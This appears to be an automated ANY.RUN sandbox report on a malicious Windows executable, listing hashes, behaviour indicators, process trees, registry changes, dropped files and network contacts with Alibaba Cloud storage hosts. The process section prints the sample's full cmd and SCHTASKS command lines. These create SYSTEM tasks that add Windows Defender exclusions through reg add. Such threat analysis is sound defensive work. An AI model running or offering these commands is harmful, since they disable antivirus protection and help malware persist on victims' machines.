File name:

aii.600581001.exe

Full analysis: https://app.any.run/tasks/9d2b684f-fc6f-4a86-97f0-a0322d66189d
Verdict: Malicious activity
Analysis date: July 06, 2025, 04:45:18
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-sch
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

EE1270F123B91B69F21228BD546B6D62

SHA1:

7B77A81A2B6FBDDA69CC0352BFF0D4B6C2B1ADBA

SHA256:

018D886CD5A2926334827645867D8459F376C905699AF9B3B639C204E5AF6C1A

SSDEEP:

98304:kbiKZ1JB+3xKhoIwOqR3fdrWzTytrx9ZbWHBWQKwrp0Bxa1207Qf4oWXLZLJSa7W:OAwpRKBupFX+saSs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • aii.600581001.exe (PID: 2128)

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 2704)
      • cmd.exe (PID: 4816)
      • cmd.exe (PID: 6140)
      • cmd.exe (PID: 2680)
      • cmd.exe (PID: 1136)

    • Modifies exclusions in Windows Defender

      • reg.exe (PID: 4788)
      • reg.exe (PID: 1880)
      • reg.exe (PID: 2348)
      • reg.exe (PID: 3872)
      • reg.exe (PID: 3396)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 2388)

    • Drops a system driver (possible attempt to evade defenses)

      • aii.600581001.exe (PID: 7044)

    • Executable content was dropped or overwritten

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 2388)

    • Creates files in the driver directory

      • aii.600581001.exe (PID: 7044)

    • The process executes via Task Scheduler

      • X3wDgt.exe (PID: 1204)
      • X3wDgt.exe (PID: 2388)
      • cmd.exe (PID: 4808)
      • cmd.exe (PID: 3572)
      • cmd.exe (PID: 5960)
      • cmd.exe (PID: 5616)
      • cmd.exe (PID: 2280)

    • Reads the date of Windows installation

      • X3wDgt.exe (PID: 2388)

    • Deletes scheduled task without confirmation

      • schtasks.exe (PID: 7064)
      • schtasks.exe (PID: 5104)
      • schtasks.exe (PID: 3476)
      • schtasks.exe (PID: 4104)
      • schtasks.exe (PID: 3488)

    • Found strings related to reading or modifying Windows Defender settings

      • X3wDgt.exe (PID: 2388)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 4808)
      • cmd.exe (PID: 3572)
      • cmd.exe (PID: 5960)
      • cmd.exe (PID: 5616)
      • cmd.exe (PID: 2280)

    • Starts CMD.EXE for commands execution

      • X3wDgt.exe (PID: 2388)

  • INFO

    • Reads the computer name

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 2388)

    • Checks supported languages

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 1204)
      • X3wDgt.exe (PID: 2388)

    • Reads the machine GUID from the registry

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 2388)

    • Creates files or folders in the user directory

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 2388)

    • Checks proxy server information

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 2388)
      • slui.exe (PID: 1984)

    • The sample compiled with english language support

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 2388)

    • Reads the software policy settings

      • aii.600581001.exe (PID: 7044)
      • X3wDgt.exe (PID: 2388)
      • slui.exe (PID: 1984)

    • Process checks computer location settings

      • X3wDgt.exe (PID: 2388)

    • Launching a file from Task Scheduler

      • cmd.exe (PID: 2704)
      • cmd.exe (PID: 4816)
      • cmd.exe (PID: 6140)
      • cmd.exe (PID: 1136)
      • cmd.exe (PID: 2680)

    • Manual execution by a user

      • cmd.exe (PID: 2032)

    • Creates files in the program directory

      • X3wDgt.exe (PID: 2388)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | InstallShield setup (91.4)
.exe | Generic Win/DOS Executable (4.2)
.exe | DOS Executable Generic (4.2)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:04:15 07:14:35+00:00
ImageFileCharacteristics: No relocs, Executable, Large address aware
PEType: PE32+
LinkerVersion: 11
CodeSize: 57344
InitializedDataSize: 163840
UninitializedDataSize: -
EntryPoint: 0x70b4
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
165
Monitored processes
47
Malicious processes
1
Suspicious processes
12

Behavior graph

Click at the process to see the details
start aii.600581001.exe slui.exe x3wdgt.exe no specs x3wdgt.exe cmd.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs aii.600581001.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
480\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1136"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FC:\Windows\System32\cmd.exeX3wDgt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1204"C:\Users\admin\Documents\X3wDgt.exe"C:\Users\admin\Documents\X3wDgt.exesvchost.exe
User:
admin
Company:
Thales
Integrity Level:
HIGH
Description:
eToken readers management tool
Exit code:
0
Version:
10,9,3283,0
Modules
Images
c:\users\admin\documents\x3wdgt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1328SCHTASKS /Run /TN "Task1" C:\Windows\System32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1564\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1800SCHTASKS /Run /TN "Task1" C:\Windows\System32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1880reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\admin\Documents" /t REG_DWORD /d 0 /fC:\Windows\System32\reg.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
1932SCHTASKS /Run /TN "Task1" C:\Windows\System32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1984C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2032cmd.exeC:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\wldp.dll
Total events
11 762
Read events
11 750
Write events
12
Delete events
0

Modification events

(PID) Process:(7044) aii.600581001.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7044) aii.600581001.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7044) aii.600581001.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7044) aii.600581001.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\JDBCC
Operation:writeName:data
Value:
6767517553326237414F335836424270316870686164485949474B6B786F47452A2F26FEA69311D145DEFEFE929F9F908490D09C8D96FEFECDDDFEFECFCEC7D0C6C6FEFE
(PID) Process:(1880) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Operation:writeName:C:\Users\admin\Documents
Value:
0
(PID) Process:(4788) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Operation:writeName:C:\ProgramData
Value:
0
(PID) Process:(2348) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Operation:writeName:C:\Users
Value:
0
(PID) Process:(3872) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Operation:writeName:C:\Program Files (x86)
Value:
0
(PID) Process:(2388) X3wDgt.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2388) X3wDgt.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
Executable files
5
Suspicious files
5
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
7044aii.600581001.exe\Device\Mup:\localhost\pipe\atsvc
MD5:
SHA256:
2388X3wDgt.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\E4DJRUXW\FOM-51[1].jpg
MD5:
SHA256:
2388X3wDgt.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\drops[1].jpgimage
MD5:F050E485170B3ED2DB0C8262CB090CD0
SHA256:5F1E6D40ADD0C324C67C384D593CAB15223A5D2F468D063A5ED7C736170B0E3A
7044aii.600581001.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH8CR9J5\d[1].gifimage
MD5:E32588D9F19096F9506A35699818F4C1
SHA256:CD679207E426507D066899A445F486D6A05D25D526F482586D70C8C9219106D4
7044aii.600581001.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\c[1].gifimage
MD5:0035DC4371138478A84E3BAA8454C764
SHA256:692721CF30588CF416B2E5C251D7070DC3C92E664EF47B7F3300187CF982EA8E
7044aii.600581001.exeC:\Users\admin\Documents\cache.datimage
MD5:2BC2D7728A4E61768F2AF334B82CCE91
SHA256:765094BC41E9FF862E52FAFAE0518E7E965F36FB0219D20D620A764F241D8CD8
7044aii.600581001.exeC:\Users\admin\Documents\perfi.dbbinary
MD5:D5533F499FBA4458AD5339A0DFBC5458
SHA256:8219609D48456BABF9F5A3E1974B4DB5463DD240383D87E4233605DDDCDA8E02
7044aii.600581001.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\E4DJRUXW\b[1].gifimage
MD5:13E05500C7D6372C50091A56CB1EB698
SHA256:3C6D987704BE11CE13F2EA7D56F9C3A6247C4F2718FD6DCD3389803A4B175845
7044aii.600581001.exeC:\Windows\SysWOW64\drivers\189atohci.sysexecutable
MD5:4A44BBA4378EF9D7639E287576383E6B
SHA256:3547CED5ABA570748D3AFC0B1C50D4303DA5A7310BB184ACFFDC0E4A2A6DF2D0
2388X3wDgt.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\f[1].datbinary
MD5:C345BADB7A3E3F956477B7945E4BE434
SHA256:B3CB5CF15F06434BB8F2C2FBDC1B86C8C057721198949928030E380AC6ED75BF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
22
TCP/UDP connections
23
DNS requests
10
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
2.20.245.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
2.20.245.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
112.74.1.157:443
https://shi5ce.oss-cn-shenzhen.aliyuncs.com/tad
unknown
binary
512 b
GET
200
2.20.245.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
112.74.1.157:443
https://shi5ce.oss-cn-shenzhen.aliyuncs.com/a.gif
unknown
GET
200
112.74.1.157:443
https://shi5ce.oss-cn-shenzhen.aliyuncs.com/b.gif
unknown
image
3.51 Mb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
2.20.245.139:80
crl.microsoft.com
Akamai International B.V.
SE
whitelisted
5944
MoUsoCoreWorker.exe
2.20.245.139:80
crl.microsoft.com
Akamai International B.V.
SE
whitelisted
2.20.245.139:80
crl.microsoft.com
Akamai International B.V.
SE
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5808
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 2.20.245.139
  • 2.20.245.137
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
shi5ce.oss-cn-shenzhen.aliyuncs.com
  • 112.74.1.157
unknown
nm25.oss-cn-hangzhou.aliyuncs.com
  • 118.178.60.98
unknown
x1.c.lencr.org
  • 2.23.197.184
whitelisted
self.events.data.microsoft.com
  • 51.105.71.137
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO DNS Query to Alibaba Cloud CDN Domain (aliyuncs .com)
Misc activity
ET INFO Observed Alibaba Cloud CDN Domain (aliyuncs .com in TLS SNI)
Misc activity
ET INFO DNS Query to Alibaba Cloud CDN Domain (aliyuncs .com)
Misc activity
ET INFO Observed Alibaba Cloud CDN Domain (aliyuncs .com in TLS SNI)
Misc activity
ET INFO Observed Alibaba Cloud CDN Domain (aliyuncs .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
aii.600581001.exe